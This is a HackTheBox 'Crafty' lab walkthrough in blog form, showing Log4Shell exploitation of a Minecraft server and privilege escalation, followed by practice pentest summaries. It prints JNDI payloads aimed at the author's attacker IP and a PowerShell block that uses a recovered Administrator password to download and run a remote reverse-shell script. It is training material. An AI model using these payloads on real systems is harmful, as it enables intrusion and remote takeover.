Crafty | HackTheBox Walkthrough + Technical/Management Summaries

James Jarvis
11 min readFeb 16, 2024

--

Introduction

Welcome to my most chaotic walkthrough (so far). I both love and hate this box in equal measure. I strongly suggest you do not use this for the ‘answer’. Use it to help learn the process, not for an easy few virtual points on a virtual website which is meaningless.

This ‘Walkthrough’ will provide my full process. It will include my many mistakes alongside (eventually) the correct solution. I encourage you to not copy my exact actions, but to use this to help you understand a different approach.

I have kept my errors in, alongside any rabbit holes I fell into. I have kept them for 2 reasons:

  • It helps my learning process to write up my miskakes/process
  • I helps show others like me that sometimes the answer isn’t ‘obvious’ or easily found.

At the end, I will include a Technical and Management summary. This is to give myself practice for my own pentest reports — you may find it useful to see how I approach these.

This is regarded as an easy box, but I found it quite challenging.

Without further ado, let’s get started.

Crafty

First, let’s do a basic nmap scan on all ports.

nmap 10.10.11.249 -p-

We should do -p0- to include port 0 too, but I realised my error too late. Hopefully this won’t be an issue..!

Minecraft, well that explains the box name!

Please note I should have exported this to a text file — I have since done this into a specially created folder for this box.

We will return to the Minecraft port shortly, but for now, let’s explore the website.

Let’s add the website to our /etc/hosts/ folder:

Straight away, we are greeted with a subdomain:

The source code provides some directories which could be of note — or could not be.

Let’s explore play.crafty.com

Well, after adding to our hosts folder, it just redirects back.

Could be an error on my part, but before I go anything further I’m going to enumerate the services found in the nmap scan:

Always worth trying to find an easy win:

Alas…

Some further exploring of directories and clues in source code, and I found this:

Nothing useful here, but when I try to go to /img:

Well, I have Minecraft, like most people do (even if you want to pretend to be too cool for it…), so let’s see if I can connect to the server!

Need to download the correct version. I imagine connecting via the IP or play.crafty.htb should work.

I then realised I didn’t have Minecraft on my VM, which means the VPN isn’t connected. Hm.

Well, did some research and downloaded TLauncher. Probably also installed a bunch of malware too. I don’t recommend this box purely for this reason.

Anyway, let’s carry on and cry together when the ransomware strikes.

I’m in the server — feels dodgy to be honest, but alas.

Some online enumeration suggests there is a vulnerability in 1.16.5 with log4j.

OK. So this is quite easy to exploit.

I found this payload:

${jndi:ldap://someaddresshere/param1=value1}

Change someaddresshere to my ip and port, set up a listener, and this is what happens:

Unfortunately, it was very unstable and kicked me out before I could screenshot my process — but as you can see, I gained a connection. Now to find out how to regain it.

Just need to work out how to input commands.

My input command/payload could also be incorrect.

I found a variant on the POC here:

With that in mind, let’s give this one a go.

Well, I had issues with space somehow. Reset my VM and now it won’t work. So don’t install TLauncher, skip this box.

**Please note at this stage I reinstalled Kali fresh. I am now searching for a method without needing a MC client.**

Let’s try good ol’ ‘reliable’ Telnet:

That wasn’t working, so I looked for a CLI for minecraft, and surprisingly found one.

git clone https://github.com/MCCTeam/Minecraft-Console-Client.git --recursive

Well, if you get that to work, do let me know. I had issues with .NET versions not correctly updating. I’m sure that is a way which works, but alas, I failed there too.

Admitting defeat and downloading Minecraft

At this point, I have spent too long on this box trying to work out the non-client solution, which is apparently ‘easier’ than this method.

So let’s revisit my earlier ideas and improve them.

I downloaded the Debian files from the website and installed it.

Reset my long forgotten password…

And we return… This time legitimately.

As with all github pages, the readme doc is always a goo source of information:

By default, the Payload (which you should always look through before initiating…) is set to /bin/sh. We know from our scans that this is a windows machine, so let’s make sure it is Windows ‘friendly’:

Alas, similar issues to before, and I can’t get this POC to work. I need to find the same java version, somehow.

I found the download links https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

I downloaded according to the previously linked POC. I had to make an account — aside the email, you can make it up — no checks there. You could also use 10 minute mail too, if you like.

Let’s move it to the right folder and unzip it.

Let’s now run our command from earlier:

NOW we are getting somewhere!

Let’s send the ‘send me’ on the MC server:

${jndi:ldap://10.10.14.15:1389/a}

Oh that’s a beautiful sight to behold, at last!

Let’s find the first flag — let’s check the usual place(s) for it.

Awesome, now let’s find root!

Let’s check the logs:

Interesting information, but not what we want.

Found an interesting file in Plugins, but couldn’t figure a way to open. I used wmic product to list installed programs to look for anything of use:

Further enumeration of the machine, looking for a simple privesc:

Trying to get winPEAS across:

Apparently nothing matches, so I’m not sure what is going wrong here.

Trying to extract other logs:

Converted to Powershell (just type in Powershell) and tried to setup a simple http server to download files across.

Forever hanging….

I decided to take a break from this box and come back to it the following day.

We were previously exploring the plugins folder. I downloaded this by gaining a reverse shell via meterpreter. The process of which is shown below:

Using hacktools, I found a way to get my reverse shell onto the machine — remember, the point of this is to get the plugin folder off their machine. Absolute faff to do so!

I setup a simple http.server on my machine and download my reverse shell onto the minecraft server.

I found out about Hack Tools, a web browser extension that gives some great tools for this.

Let’s use the cmd compatible command. I will edit it in notepad to the correct command for ease. Note: The second ‘shell.exe’ is the output name for the file.

Customise the payload accordingly. Note: The second ‘shell.exe’ is the output file name.

Let’s run the handler and start the reverse shell:

PLEASE NOTE: I had issues running the reverse.exe in the default server directory. /logs worked fine. This could be a low level filter.

Let’s now download the java file. If we do not find anything here, we could explore other files too.

We can view this with JD-gui. This isn’t default Kali but can be easily installed if needed:

Opening it up, I import the playcount file and explore. After checking each file, I found a string of letters and numbers that could resemble a password:

Now to work out how to use this password.

I continued my research. I found that a good route would be to try and upload a payload to the machine to execute an admin shell.

We know we can access PowerShell, so let’s try a PowerShell exploit. To make this, I could spend years learning the intricacies of PowerShell— or use a reverse shell generator.

I copy/pasted this payload onto my local machine into a nano file I aptly titled: rev.ps1 — note the extension. Since this will be a PowerShell exploit, it needs to be .ps1.

I tried runas commands and other elevation commands with no success, which means we need to try and run as admin within a different command.

After research, I found these commands with variables that could work:

$SecPass = ConvertTo-SecureString 's67u84zKq8IXw' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('Administrator',$SecPass)

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:7777/rev.ps1')" -Credential $cred

We are setting variables to access the admin account. With this, we are going to start Powershell, download our reverse shell and execute it. I have already changed it for my details — you may need to adjust accordingly.

Trying to juggle lot’s of listener’s is a challenge… got there eventually.

From there, you will find the flag in a common HTB flag location.

And there we go, my most chaotic walkthrough so far — I excluded a lot of my troubles, too…

Below are some rudimentary Management and Technical Summaries. The point here is for my own personal practice at writing them. As a Pentester, you need to be able to write reports — not just get flags!

Management Summary

This test was conducted 14th February — 15th February 2024. Only the target target in scope was explored, 10.10.11.249, http://crafty.htb.

A webpage and Minecraft server were found. The biggest vulnerability is the Minecraft server version being verbose on a scan. The Minecraft version identified, 1.16.5 has a critical vulnerability which can be exploited with ease, as can be seen in this report. This will jeopardise user Confidentiality, and can lead to the Integrity and Availability of the server being at risk. Best practice dictates the server is taken down until either a patch can be installed, or a newer version can be installed.

Furthermore, the webpage uses HTTP, which is not considered secure. HTTPS would improve the website security.

Technical Summary

This test was conducted 14th February — 15th February 2024. Only the target target in scope was explored, 10.10.11.249, http://crafty.htb.

A HTTP webpage and Minecraft server were identifed with an nmap scan. The scan showed the server is running IIS 10.0 — IIS verbosity is not best practice. Nmap Service versions were verbose, which allowed for easy enumeration of vulnerabilities. The minecraft server on port 25565 was identified as v1.16.5 which has known Log4j vulnerabilities, as documented under CVE-2021–44228. This vulnerability allows users on the server to type in a simple payload to gain a shell on the server. Whilst some permissions restrict damage, a method exists which allows privilege escalation with administrator rights. This will jeopardise user Confidentiality, and can lead to the Integrity and Availability of the server being at risk. Best practice dictates server either an immediate patch or an update to the latest version.

A webpage was also found using HTTP. Best practice dictates that HTTPS is used to ensure user and server data is encrypted, minimises the risk and damage of a MITM attack or other. Within the source code, some default comments have been left in. Best practice dictates that these are removed, alongside any other coding artifacts.

Concluding Remarks

A difficult box juggling many listeners. I hope you enjoyed this explanation and summaries.

Constructive feedback welcome.

Edit 1: I was listening to a podcast which discussed a similar vulnerability regarding log4j exploitation through log files:

--

--